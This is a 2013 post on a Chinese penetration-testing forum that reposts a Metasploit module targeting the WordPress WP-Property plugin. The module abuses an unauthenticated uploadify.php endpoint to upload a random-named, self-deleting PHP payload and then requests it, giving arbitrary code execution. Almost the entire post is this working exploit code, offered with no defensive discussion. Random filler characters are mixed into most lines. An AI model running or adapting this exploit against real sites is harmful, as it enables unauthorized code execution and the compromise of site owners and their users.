中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]

作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞5 e* U# w" M) |  ^; O2 a

1 N5 ^  n- g! U% l ## # This file is part of the Metasploit Framework and may be subject to' W: C1 r( W: b0 T/ `, R( i

3 @" W, Y" H+ x- x# redistribution and commercial restrictions. Please see the Metasploit
+ R' K. k# ^4 w0 n* v8 w& q& @/ l9 U- @0 v
# Framework web site for more information on licensing and terms of use.3 [# F+ ^# M& f

8 h5 Q2 F. {& q2 {#   http://metasploit.com/framework/ ##
0 w5 B3 E% Y! H  U. i' H: e' b5 y2 f3 G  L- d' L. `
, b2 H. K! H" p& ]& c

" \' o# n. Z8 W* a2 I/ \
! b! ~0 R9 T. F3 T& Z( o- F# Y0 n
" T* Z. }- y' F! o: H8 }9 rrequire 'msf/core'
4 _( D: p4 V6 I% L) M7 \& mrequire 'msf/core/exploit/php_exe'
! d1 o3 j  }+ S9 R# o. b% h, }& t. {
class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',8 H7 t7 t4 {0 W1 s
'Description'    => %q{
( }6 C1 j  f. ~+ NThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>$ v  @+ a5 G) s, D
[
' S6 L5 W+ H" H8 g6 q'Sammy FORGIT', # initial discovery% I. x  c% _( }  }0 S5 Q
'James Fitts <fitts.james[at]gmail.com>' # metasploit module! C8 C0 k+ l( M! }( ?7 u
],
% l* [4 D5 \  V# \) S1 q( p7 `'License'        => MSF_LICENSE,
9 @0 v( W8 a) i& V" Y/ I' M'References'     =>: P) y) u) u/ d
[
* t5 U* a& x9 v5 J9 {[ 'OSVDB', '82656' ],3 q5 ?7 X& y& Z6 Q% ^- b0 I) ~
[ 'BID', '53787' ],7 z) A, F5 _. a. @4 G
[ 'EDB', '18987'],/ I5 |6 c( F7 U5 b1 S( ~
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]/ J( A8 c5 j% `' k- K; \
],9 O+ q! e% L+ w; c' ~9 m
'Payload'        =>- h1 _8 X2 S2 z2 t
{
5 i$ E* O: i! [& e, H8 V6 T'BadChars' => "\x00",
% Z+ ~5 @: d4 R: v* b0 G( `0 i4 o},
$ b; N6 G* s/ ]. i! o1 q& n$ M'Platform'       => 'php',2 ^8 P8 H3 `% }* Y2 C3 t  f  C. U
'Arch'           => ARCH_PHP,
: q: Z/ F4 m# w& Q'Targets'        =>6 A! B# A4 H3 N9 u
[$ k& L5 C, f+ b' |. I4 ^9 v; z
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
) w0 w! ]) r8 \& ]3 T! O[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
# Y; c8 c0 z# U' z, ?],0 r+ R7 z! q4 \) r2 b
'DefaultTarget'  => 0," v6 n" @- e# X) Y7 Y& g4 Z
'DisclosureDate' => 'Mar 26 2012'))
% e* `) O9 |/ o# _1 z* k  G7 h$ v
register_options(2 e9 d4 g& r( f6 o, V( S4 R' k- L6 U
[. v3 Q& M- E/ Q5 H6 f
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])2 p$ |( }5 \; W- B% D1 \
], self.class)8 J3 F9 [' ?0 t! X+ E
end4 @8 F; n$ D/ v$ y. V9 R
4 N0 O1 Y( g4 I, [, {$ l2 w2 [* P
def check
( A2 x' a9 o; W; l: Uuri =  target_uri.path
# `0 ?) z( d1 Z" M  i5 uuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',$ t" M+ p( S# I2 X) @  P
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"% ~8 P. x9 I9 \6 n
})
( q$ @2 C) I1 _) t; w" e, N
! B6 S  |) @! }: Fif not res or res.code != 200
- k9 [0 v4 \8 |; \+ q  X* T5 ?return Exploit::CheckCode::Unknown
5 q5 s- |5 r6 E* K# Tend
8 ?7 T# T% ~5 F# d, t: l* s# Y, X# }$ e- g& H4 w
return Exploit::CheckCode::Appears
; I5 R9 L& K, S* n! n9 fend/ u) Q4 N) D- b6 s# N7 ]

7 k% N6 l6 a9 cdef exploit
7 \! g( l5 o, M$ ]( w3 F+ O( t) Uuri =  target_uri.path/ l! r# f5 `& c( \
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true); ^; f) o  j# m# n( Z
4 B% `# O. T# Z/ r3 J! m3 `0 P" T) x
data = Rex::MIME::Message.new
" X" [; T- Z0 s. X/ cdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
' ]; G( e' L' t0 I6 m) }data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")' u' \; o( U. A  c3 r
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'); e9 f8 h9 {6 V$ ~2 A: r! ~3 }

3 _- n# ]# u+ [; g, Hprint_status("#{peer} - Uploading payload #{@payload_name}")) b/ z! \, D. h$ p2 E0 Z
res = send_request_cgi({
4 q9 U; W. m" L4 I# k+ _'method' => 'POST',
! v; W2 i/ m7 s. P! q7 Z. e) l" M'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
$ k1 w2 z+ l3 G0 D! L& A% J'ctype'  => "multipart/form-data; boundary=#{data.bound}",
) C" @) M  Q* b6 b$ z9 p'data'   => post_data
3 h3 b8 k( V4 O})
  a& Q# h: [: b( J1 O& P) _2 G
0 ^& X# R; q/ E2 {" W* Xif not res or res.code != 200 or res.body !~ /#{@payload_name}/
% Z9 j3 v5 `# @4 K$ O  W0 `fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
# ]/ d% Y( R& V( Z. Xend
  K0 O9 u: T" l2 J9 H# m7 K4 C' V+ ?4 O: |/ i# f
upload_uri = res.body7 E+ t3 d# a/ L) U4 x, d* {
0 Z4 c, v. \$ }7 d& }( G  L# n
print_status("#{peer} - Executing payload #{@payload_name}")/ Y$ x+ F" U. x8 a
res = send_request_raw({
3 A6 u! b% J4 Y& @: m'uri'    => upload_uri,  S/ S. S' w" H
'method' => 'GET'
) d1 n, ^# S2 z})& h+ q  D1 ~0 z" ?/ L. A
end; Y. ?0 H- A" C! ^* l3 v& K
end
# E) R8 N- S: b
% v) [" X* a% O  [) ?6 Y3 w不要问我这写的是什么 怎么利用 我是说msf.  y  j6 e5 |5 D# n9 E$ F% u

- n( {4 Y* p, J




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2